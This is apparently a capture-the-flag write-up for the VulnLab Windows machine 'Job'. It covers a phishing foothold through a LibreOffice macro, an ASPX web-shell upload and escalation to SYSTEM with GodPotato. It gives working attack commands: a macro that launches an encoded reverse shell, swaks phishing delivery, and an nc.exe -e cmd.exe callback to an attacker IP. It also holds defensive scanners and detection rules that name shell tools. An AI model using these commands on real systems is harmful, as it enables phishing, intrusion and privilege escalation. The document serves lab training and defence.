Overview

Field        Detail
Name         Job
OS           Windows
Difficulty   Medium
Platform     VulnLab
Topics       LibreOffice Macro RCE, SMTP phishing, IIS write access, SeImpersonatePrivilege, GodPotato

Attack Path

flowchart TD
    A[Attacker] --> B[Send malicious .odt\nto career@job.local]
    B --> C[LibreOffice macro executes\nreverse shell]
    C --> D[Shell as jack.black\nMedium Integrity]
    D --> E[jack.black in 'developers' group\nWrite access to C:\\inetpub\\wwwroot]
    E --> F[Upload Nishang ASPX shell\nShell as IIS App Pool]
    F --> G[SeImpersonatePrivilege enabled\non web service account]
    G --> H[GodPotato exploit]
    H --> I[Shell as NT AUTHORITY\\SYSTEM]

Enumeration

Service Scan

An Nmap scan reveals a fairly minimal attack surface — only standard Windows services are exposed.

nmap --privileged -sC -sV -vv -oA nmap/job --min-rate 5000 -T4 -p- 10.129.224.177

Port       Service              Notes
25/tcp     hMailServer SMTP     AUTH LOGIN supported
80/tcp     Microsoft IIS 10.0   Static site at Job.local
445/tcp    SMB
3389/tcp   RDP
5985/tcp   WinRM

HTTP Enumeration

The web page at port 80 is a largely static site. The only useful detail it reveals is an instruction to submit CVs to career@job.local in LibreOffice document format. This is the key entry point.


Foothold — Shell as jack.black

Crafting the Malicious LibreOffice Macro

Since the target opens .odt files, we can embed an auto-executing macro.

  1. Open LibreOffice Writer and navigate to Tools → Edit Macros.
  2. Create a new Standard Module inside the document with the following payload:

' Bound to the Open Document event below, so it runs as soon as the file is opened
Sub OnLoad
    Shell("cmd /c powershell -e <BASE64_ENCODED_REVERSE_SHELL>")
End Sub

  3. Bind the macro to the document open event via Tools → Customize → Events → Open Document → select your macro.
  4. Save the file as .odt.

Sending the Phishing Email

With the document ready, deliver it to the target mailbox using either sendemail or swaks:

# Using sendemail
sendemail -s job.local -f "nitel <test@nitel.com>" -t career@job.local \
    -o tls=no -m "hey pls check my cv" -a nitel.odt

# Using swaks
swaks --to career@job.local --from test@nitel.com \
    --header "Subject: Hire me!" \
    --body "Please review my resume" \
    --attach @nitel.odt \
    --server 10.129.224.177

Start a listener on your attack machine and wait for the document to be opened.
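The defensive counterpart to the two steps above (the auto-executing macro and its delivery over open SMTP) is an attachment check at the mail gateway. The following is an added example, not code from the write-up or from VulnLab: it opens an .odt package (a zip), looks for embedded Basic libraries under Basic/, reads the document-event bindings that Tools → Customize → Events writes into content.xml, and flags macro source that calls out to a shell. The event name dom:load, the keyword list and the block/quarantine policy are assumptions made for this example; the sample packages are constructed in memory so it runs offline.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# ODF 1.2 namespace URIs used inside content.xml.
NS_SCRIPT = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
NS_XLINK = "http://www.w3.org/1999/xlink"
# Event names assumed to fire with no user interaction once the document is opened.
AUTO_EVENTS = {"dom:load", "office:load"}
# Basic calls that let a macro reach outside the document (heuristic list, an assumption).
SUSPICIOUS = re.compile(r"\b(Shell|CreateObject|WScript|powershell|cmd)\b", re.IGNORECASE)


def scan_odt(data: bytes) -> dict:
    """Inspect one ODT package (bytes) and return what a gateway needs for a decision."""
    findings = {"modules": [], "auto_events": [], "suspicious_calls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Embedded Basic libraries are stored as Basic/<Library>/<Module>.xml;
        # script-lc.xml and script-lb.xml are only the library/module indexes.
        for name in names:
            base = name.rsplit("/", 1)[-1]
            if name.startswith("Basic/") and base.endswith(".xml") and not base.startswith("script-l"):
                findings["modules"].append(name)
                source = "".join(ET.fromstring(zf.read(name)).itertext())
                for m in SUSPICIOUS.finditer(source):
                    findings["suspicious_calls"].append((name, m.group(1)))
        # Event bindings are serialised in content.xml as
        # office:scripts/office:event-listeners/script:event-listener elements.
        if "content.xml" in names:
            root = ET.fromstring(zf.read("content.xml"))
            for el in root.iter("{%s}event-listener" % NS_SCRIPT):
                event = el.get("{%s}event-name" % NS_SCRIPT, "")
                target = el.get("{%s}href" % NS_XLINK, "")
                if event in AUTO_EVENTS:
                    findings["auto_events"].append((event, target))
    return findings


def verdict(findings: dict) -> str:
    """Gateway policy (assumed): auto-executing macro with shell-capable calls is blocked."""
    if findings["auto_events"] and findings["suspicious_calls"]:
        return "block"
    if findings["modules"] or findings["auto_events"]:
        return "quarantine"
    return "allow"


# --- Constructed sample packages (not real submissions) ----------------------------

CONTENT_WITH_BINDING = (
    '<office:document-content '
    'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
    'xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" '
    'xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<office:scripts><office:event-listeners>'
    '<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
    'xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&amp;location=document"/>'
    '</office:event-listeners></office:scripts>'
    '<office:body><office:text/></office:body></office:document-content>'
)
CONTENT_CLEAN = (
    '<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0">'
    '<office:body><office:text/></office:body></office:document-content>'
)
# Macro body from the write-up, payload left as a placeholder (XML-escaped angle brackets).
MODULE_XML = (
    '<script:module xmlns:script="http://openoffice.org/2000/script" '
    'script:name="Module1" script:language="StarBasic">'
    'Sub OnLoad\n    Shell("cmd /c powershell -e &lt;BASE64_ENCODED_REVERSE_SHELL&gt;")\nEnd Sub'
    '</script:module>'
)


def build_sample_odt(with_macro: bool) -> bytes:
    """Build a minimal ODT-shaped zip in memory; with_macro adds the library and the binding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", CONTENT_WITH_BINDING if with_macro else CONTENT_CLEAN)
        if with_macro:
            zf.writestr("Basic/script-lc.xml", "<libraries/>")
            zf.writestr("Basic/Standard/script-lb.xml", "<library/>")
            zf.writestr("Basic/Standard/Module1.xml", MODULE_XML)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("macro", build_sample_odt(True)), ("clean", build_sample_odt(False))):
        result = scan_odt(blob)
        print(label, verdict(result), result)
```

The check is deliberately structural rather than signature-based: a document that carries any Basic library, or any open-document binding, is already unusual for a CV and is worth holding, while the combination of both with a Shell call is what the write-up's payload looks like on disk.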

Shell Received

PS C:\Program Files\LibreOffice\program> whoami /all
USER INFORMATION
----------------
User Name      SID
============== =============================================
job\jack.black S-1-5-21-3629909232-404814612-4151782453-1000

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

jack.black runs at Medium Integrity with no directly dangerous privileges — but is a member of the developers group.


Lateral Movement — Shell as IIS App Pool

Leveraging the developers Group

Group membership in developers grants write access to C:\inetpub\wwwroot. We can drop a web shell here to get code execution under the IIS application pool identity.

Upload a Nishang ASPX reverse shell:

# From jack.black's shell
copy \\10.10.14.152\share\shell.aspx C:\inetpub\wwwroot\shell.aspx

Then trigger it from your browser or via curl:

curl http://job.local/shell.aspx

This gives a new shell running as the IIS application pool service account.
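The misconfiguration this step relies on is visible in the ACL of the web root, and it is cheap to audit. The following is an added example (not part of the write-up) that parses icacls output for C:\inetpub\wwwroot and reports any principal outside an allow-list of administrative identities that holds a right allowing file creation or modification. The icacls output, the trusted-principal list and the set of rights treated as "write" are assumptions constructed for this example.

```python
import re

# Rights tokens that allow creating or modifying files (icacls notation).
# F = full, M = modify, W = write, WD = write data/add file, AD = append data/add subdirectory.
WRITE_TOKENS = {"F", "M", "W", "WD", "AD"}
# Principals expected to hold write rights on a web root (assumption for this audit).
TRUSTED = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "NT SERVICE\\TrustedInstaller",
    "CREATOR OWNER",
}

ACE_RE = re.compile(
    r"^(?:(?P<path>[A-Za-z]:\\\S*)\s+)?"   # optional leading path on the first line of an entry
    r"(?P<principal>[^:()]+):"             # DOMAIN\name or well-known name (no colon inside)
    r"(?P<flags>(?:\([^)]*\))+)\s*$"       # one or more (..) groups: inheritance flags and rights
)


def parse_icacls(output: str):
    """Yield (path, principal, rights) for every ACE line in icacls output."""
    current_path = None
    for line in output.splitlines():
        m = ACE_RE.match(line.strip())
        if not m:
            continue  # blank lines and the "Successfully processed ..." summary
        if m.group("path"):
            current_path = m.group("path")
        rights = set()
        for tok in re.findall(r"\(([^)]*)\)", m.group("flags")):
            # split composite specific-rights groups such as (Rc,S,RA)
            rights.update(t.strip() for t in tok.split(","))
        yield current_path, m.group("principal").strip(), rights


def audit_web_root(output: str):
    """Return ACEs that let a non-administrative principal write into the path."""
    findings = []
    for path, principal, rights in parse_icacls(output):
        if principal in TRUSTED:
            continue
        granted = sorted(rights & WRITE_TOKENS)
        if granted:
            findings.append((path, principal, granted))
    return findings


# Constructed icacls output modelled on the write-up's finding (not captured from the box).
SAMPLE_ICACLS = r"""C:\inetpub\wwwroot NT SERVICE\TrustedInstaller:(I)(F)
                   NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                   BUILTIN\Administrators:(I)(F)
                   BUILTIN\Users:(I)(RX)
                   BUILTIN\IIS_IUSRS:(I)(OI)(CI)(RX)
                   JOB\developers:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, principal, granted in audit_web_root(SAMPLE_ICACLS):
        print(f"[!] {principal} can write to {path}: {granted}")
```

On the sample the only hit is JOB\developers with Modify, which is exactly the ACE that turns group membership into code execution as the application pool; the fix is to remove that explicit ACE and deploy content through a pipeline that does not give developers an interactive write path into the served directory.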


Privilege Escalation — Shell as SYSTEM

SeImpersonatePrivilege via GodPotato

The IIS service account has SeImpersonatePrivilege enabled — a well-known path to SYSTEM via potato-family exploits.

Upload GodPotato and nc.exe to a world-writable staging directory:

copy \\10.10.14.152\share\gp.exe C:\ProgramData\gp.exe
copy \\10.10.14.152\share\nc.exe C:\ProgramData\nc.exe

With nc.exe

C:\ProgramData\gp.exe -cmd "C:\ProgramData\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.152 7000"

Without nc.exe (pure PowerShell)

C:\ProgramData\gp.exe -cmd "powershell -ep bypass -e <BASE64_ENCODED_REVERSE_SHELL>"

Catch the callback on your listener — and you’re SYSTEM.
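Every hop in this chain leaves a process-creation record, and the lineage is what a detection should key on: LibreOffice spawning a shell (foothold), w3wp.exe spawning a shell (web shell), and a child running as NT AUTHORITY\SYSTEM whose parent did not (the shape of an impersonation-privilege abuse). The following is an added example, not code from the write-up: it runs three such rules over a handful of constructed Sysmon-style Event ID 1 records that mirror the chain above. The records, the process-name lists and the three-hop ancestry window are assumptions made for this example.

```python
# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# They mirror the write-up's chain; they are not logs captured from the box.
SAMPLE_EVENTS = [
    {"pid": 900,  "ppid": 1,    "image": r"C:\Windows\explorer.exe",                                    "user": r"JOB\jack.black"},
    {"pid": 1000, "ppid": 900,  "image": r"C:\Program Files\LibreOffice\program\soffice.bin",           "user": r"JOB\jack.black"},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",                                "user": r"JOB\jack.black"},
    {"pid": 1200, "ppid": 1100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  "user": r"JOB\jack.black"},
    {"pid": 2000, "ppid": 700,  "image": r"C:\Windows\System32\inetsrv\w3wp.exe",                       "user": r"IIS APPPOOL\DefaultAppPool"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",                                "user": r"IIS APPPOOL\DefaultAppPool"},
    {"pid": 2200, "ppid": 2100, "image": r"C:\ProgramData\gp.exe",                                      "user": r"IIS APPPOOL\DefaultAppPool"},
    {"pid": 2300, "ppid": 2200, "image": r"C:\ProgramData\nc.exe",                                      "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 3000, "ppid": 600,  "image": r"C:\Windows\System32\svchost.exe",                            "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 3100, "ppid": 900,  "image": r"C:\Windows\System32\cmd.exe",                                "user": r"JOB\jack.black"},
]

# Process-name lists are assumptions for this example; extend them for your estate.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
OFFICE = {"soffice.bin", "soffice.exe", "winword.exe", "excel.exe"}
WEB_WORKERS = {"w3wp.exe"}
SYSTEM = "NT AUTHORITY\\SYSTEM"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def lineage(event: dict, by_pid: dict, depth: int = 3):
    """Yield up to `depth` ancestors of event, nearest first; stop where lineage is unknown."""
    cur = event
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return
        yield cur


def detect(events: list) -> list:
    """Return (rule, pid) alerts for the three lineage rules described in the lead-in."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        ancestors = list(lineage(e, by_pid))
        if not ancestors:
            continue  # parent started before logging began; nothing to reason about
        child = basename(e["image"])
        parent = ancestors[0]
        # Rule 1: a shell anywhere under an office/LibreOffice process (macro execution).
        if child in SHELLS and any(basename(a["image"]) in OFFICE for a in ancestors):
            alerts.append(("office_spawns_shell", e["pid"]))
        # Rule 2: a shell anywhere under the IIS worker process (web shell).
        if child in SHELLS and any(basename(a["image"]) in WEB_WORKERS for a in ancestors):
            alerts.append(("web_worker_spawns_shell", e["pid"]))
        # Rule 3: child runs as SYSTEM but its direct parent did not (token/impersonation abuse).
        if e["user"] == SYSTEM and parent["user"] != SYSTEM:
            alerts.append(("privilege_jump_to_system", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid}")
```

Rule 3 is the one that matters for the potato step: the exploit binary itself can be renamed, but the resulting SYSTEM child of an application-pool process cannot hide its user mismatch in the process-creation record. Removing SeImpersonatePrivilege from the application pool identity (or running the site under a virtual account with no need for it) removes the condition the rule is watching for.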


Key Takeaways

  • Client-side phishing via SMTP is underrated on CTF boxes. When a mail server is open and the web page hints at document submissions, always think macro payloads. LibreOffice’s Open Document event makes this trivially automatable.
  • Group membership deserves as much attention as privileges. jack.black had no dangerous token privileges, but the developers group quietly granted write access to the web root — enabling a clean lateral move to a service account.
  • SeImpersonatePrivilege on a Windows service account is almost always game over. GodPotato is a reliable modern option that works even on fully patched Windows Server targets where older potato exploits fail.
  • Stageless delivery works well here. Both the ASPX shell and GodPotato were dropped to C:\ProgramData, which is world-writable by default — no need for complex staging infrastructure.